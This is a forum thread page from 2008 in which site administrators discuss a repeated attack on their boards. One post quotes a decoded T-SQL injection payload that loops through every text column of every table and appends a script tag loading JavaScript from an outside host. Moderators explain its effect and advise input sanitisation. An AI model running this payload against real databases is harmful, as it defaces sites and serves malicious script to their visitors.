Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
 Password:
Save Password
Forgot your Password?

 All Forums
 Community Forums
 Community Discussions (All other subjects)
 URL puzzle		  New Topic  Reply to Topic
 Printer Friendly
Previous Page
Author Previous Topic Topic Next Topic
Page: of 2

Podge
Support Moderator

Ireland
3775 Posts
Posted - 13 May 2008 :  14:50:20  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
No problem. If its a CMS you're after then try Umbraco.<
Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.
Go to Top of Page

Mr Pink
Junior Member

United Kingdom
387 Posts
Posted - 14 May 2008 :  07:37:41  Show Profile  Visit Mr Pink's Homepage  Send Mr Pink an AOL message  Reply with Quote
There was another attempt today. I posted the string into the convertor and it came up with this

quote:
?DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.direct84.com/7.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
<
Martin
Leyland Forum Leyland Lancashire UK
Go to Top of Page

AnonJr
Moderator

United States
5768 Posts
Posted - 14 May 2008 :  08:15:15  Show Profile  Visit AnonJr's Homepage  Reply with Quote
Persistant buggers.<
Go to Top of Page

Podge
Support Moderator

Ireland
3775 Posts
Posted - 14 May 2008 :  08:18:37  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
Thats nasty. The query inserts a javascript into every text type column in your database.<
Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.
Go to Top of Page

Astralis
Senior Member

USA
1218 Posts
Posted - 14 May 2008 :  12:12:35  Show Profile  Send Astralis a Yahoo! Message  Reply with Quote
That's exactly what happened to me. How did they get in? How to stop this??<
Go to Top of Page

Podge
Support Moderator

Ireland
3775 Posts
Posted - 14 May 2008 :  12:27:22  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
You need to sanitise all user input. Lots of stuff on Google<
Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.
Go to Top of Page
Page: of 2 Previous Topic Topic Next Topic  
Previous Page
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.08 seconds. Powered By: Snitz Forums 2000 Version 3.4.07